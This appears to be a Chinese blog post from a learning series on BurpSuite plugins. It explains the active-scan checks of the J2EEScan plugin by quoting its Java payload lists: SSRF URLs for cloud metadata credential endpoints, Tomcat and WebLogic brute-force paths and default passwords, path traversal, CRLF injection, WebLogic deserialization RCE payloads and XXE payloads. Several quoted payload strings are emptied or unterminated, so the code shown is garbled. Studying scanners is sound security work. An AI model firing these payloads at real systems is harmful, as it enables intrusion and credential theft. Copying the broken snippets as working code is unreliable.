插件开发学习第11套。前置文章:
【BurpSuite】插件开发学习之Log4shell
【BurpSuite】插件开发学习之Software Vulnerability Scanner
【BurpSuite】插件开发学习之dotnet-Beautifier
【BurpSuite】插件开发学习之active-scan-plus-plus
【BurpSuite】插件开发学习之J2EEScan(上)-被动扫描
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(1-10)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(11-20)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(21-30)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(31-40)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(41-50)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(51-60)
地址:
private static final List<byte[]> SSRF_INJECTION_TESTS = Arrays.asList(
"gopher://localhost:22/".getBytes(),
"http://[::]:22/".getBytes(),
"ftp://[::]:22/".getBytes(),
"ftp://localhost:22/".getBytes(),
"ftp://0.0.0.0:22/".getBytes(),
"ftp://0177.0000.0000.0001:22".getBytes(),
"ftp://0x7f.1:22/".getBytes(),
"http://spoofed.burpcollaborator.net:22/".getBytes()
);
这是打本地的22端口
match就是
private static final byte[] GREP_STRING = "OpenSSH".getBytes();
然后就是访问云上各种元数据
private static final Map<byte[], Pattern> SSRF_CLOUD_INJECTION_TESTS = new HashMap<byte[], Pattern>() {
{
put("http://169.254.169.254/latest/meta-data/".getBytes(), Pattern.compile("identity-credentials", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
put("http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token".getBytes(), Pattern.compile("token_type", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
}
这里注释给出了一些情况
*
* Source AWS
* http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
*
* http://169.254.169.254/latest/user-data
* http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLENAME]
* http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLENAME]
* http://169.254.169.254/latest/meta-data/ami-id
* http://169.254.169.254/latest/meta-data/reservation-id
* http://169.254.169.254/latest/meta-data/hostname
* http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
* http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
*
* # AWS - Dirs http://169.254.169.254/
* http://169.254.169.254/latest/meta-data/
* http://169.254.169.254/latest/meta-data/public-keys/
*
互联网上也有很多总结
http://cn-sec.com/archives/840191.html
payload
private static final List<String> STATUS_SERVLET_PATHS = Arrays.asList(
"/status?full=true",
"/web-console/status?full=true",
"/server-status?full=true"
);
如果是401
if (statusInfo.getStatusCode() == 401) {
则认为是存在登录接口
然后就是弱口令测试
WeakPasswordBruteforcer br = new WeakPasswordBruteforcer();
如果match到了200且有如下返回,说明存在不同类型服务信息泄露
private static final byte[] GREP_STRING_J2EE = "Status Servlet".getBytes();
private static final byte[] GREP_STRING_HTTPD = "Apache Server Status".getBytes();
tomcat管理后台泄露,比较常见了
private static final List<String> TOMCAT_HOST_MANAGER_PATHS = Arrays.asList(
"/host-manager/html?j2eescan"
);
爆破
同63
private static final List<String> TOMCAT_MANAGER_PATHS = Arrays.asList(
"/manager/html"
);
Jboss的问题
payload
private static final List<String> JBOSS_PATHS = Arrays.asList(
"/..\\\\standalone\\\\configuration\\\\standalone.xml"
);
match的是读取的xml
private static final List<byte[]> GREP_STRINGS = Arrays.asList(
".getBytes()
);
未授权访问tomcat
private static final List<String> TOMCAT_URI_NORMALIZATIONS = Arrays.asList(
"..;/manager/html",
"..;/"
);
眼熟啊,shiro的未授权访问也是这么绕的
好像又是个crlf
payload
private static final byte[] INJ = "%E5%98%8A%E5%98%8DX-Injection:%20test".getBytes();
match返回包
if (getResponseHeaderValue(responseInfo, "X-Injection") != null) {
payload
private static final List<String> WEBINF_PATHS = Arrays.asList(
"/WEB-INF./web.xml",
"//WEB-INF/web.xml",
"/WEB-INF/web.xml",
"/static/WEB-INF/web.xml", // CVE-2014-0053
"/forward:/WEB-INF/web.xml", // spring issue
"/web-inf./web.xml", // CVE-2016-0793 https://bugzilla.redhat.com/show_bug.cgi?id=1305937
"/.//WEB-INF/web.xml",
"/./WEB-INF/web.xml"
);
match
private static final byte[] GREP_STRING = ".getBytes();
任意文件读取也可以多尝试此类文件。
登录接口path
private static final List<String> WEBLOGIC_CONSOLE_PATHS = Arrays.asList(
"/console/login/LoginForm.jsp;ADMINCONSOLESESSION=TynPs0LnRt9BLctc13WMYmhQpsp3cG1LCNDp78TJyDfHMWhC4Kln!1225542286"
);
match
private static final List<byte[]> GREP_WEBLOGIC_STRINGS = Arrays.asList(
"BEA WebLogic Server Administration Console" .getBytes(),
"Oracle WebLogic Server Administration Console" .getBytes(),
"WebLogic Server" .getBytes()
);
说明存在爆破的可能
然后开始爆破
List<Map.Entry<String, String>> credentials = new ArrayList<>();
credentials.add(new AbstractMap.SimpleEntry<>("weblogic", "weblogic"));
credentials.add(new AbstractMap.SimpleEntry<>("weblogic", "weblogic1"));
credentials.add(new AbstractMap.SimpleEntry<>("weblogic", "weblogic01"));
credentials.add(new AbstractMap.SimpleEntry<>("weblogic", "welcome1"));
比较粗糙,只尝试了4个弱口令和一个账号。
问题路径
private static final List<String> ASYNC_PATHS = Arrays.asList(
"/_async/AsyncResponseService"
);
payload
String serializedRce = " "
+ ""
+ "ONRaJntRjNYBc3MJW2JC "
+ "42PlWZ15ODi1hQ3pQ5Ol "
+ ""
+ ""
+ ""
+ ""
+ "/bin/bash "
+ ""
+ ""
+ "-c "
+ ""
+ ""
+ "ping -c 3 %s "
+ ""
+ ""
+ " "
+ ""
+ ""
+ ""
+ " "
+ "";
// Collaborator context
这是个RCE hw用的可能比较多
这个可以尝试的path就更多了
private static final List<String> WLS_WSAT_PATHS = Arrays.asList(
"/wls-wsat/CoordinatorPortType",
"/wls-wsat/CoordinatorPortType11",
"/wls-wsat/ParticipantPortType",
"/wls-wsat/ParticipantPortType11",
"/wls-wsat/RegistrationPortTypeRPC",
"/wls-wsat/RegistrationPortTypeRPC11",
"/wls-wsat/RegistrationRequesterPortType",
"/wls-wsat/RegistrationRequesterPortType11"
);
payload
String serializedRce = ""
+ ""
+ ""
+ " "
+ " "
+ " http://%s "
+ " "
+ " "
+ " "
+ " "
+ " "
+ ""
+ ""
+ " "
+ "";
这也是RCE
path
private static final List<String> UDDI_PATHS = Arrays.asList(
"/uddiexplorer/"
);
match到这些
private static final List<byte[]> GREP_SSRF_STRINGS = Arrays.asList(
"could not connect over HTTP to server:".getBytes(),
"XML_SoapException: Connection refused".getBytes(),
"XML_SoapException: Received a response from url".getBytes()
);
说明存在SSRF
漏洞path
private static final List<String> WS_TEST_PAGES = Arrays.asList(
"/ws_utc/config.do"
);
match
private static final List<byte[]> GREP_STRINGS = Arrays.asList(
"settings ".getBytes()
);
则存在漏洞
payload一把锁
private static final List<byte[]> XINCLUDE_INJ_TESTS = Arrays.asList(
"" .getBytes());
payload
private static final String XXE_DTD_DEFINITION = "]>";
这是可回显的,看着像是通用性的一个插件
payload
private static final List<byte[]> XXE_INJECTION_TESTS = Arrays.asList(
"]>&xxe; ".getBytes(),
// https://twitter.com/Agarri_FR/status/656440244116574208
" %dtd;]> ]]>".getBytes()
);
一样的
一个是打did一个是直接解析回显
match
private static final List<Pattern> XXE_RE_MATCHES = Arrays.asList(
Pattern.compile("root:.*:0:[01]:", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE),
Pattern.compile("file not found", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE),
Pattern.compile("java\\.io\\.FileNotFoundException", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
但通常打did不用file测试,用http协议会比较常见可以打DNSlog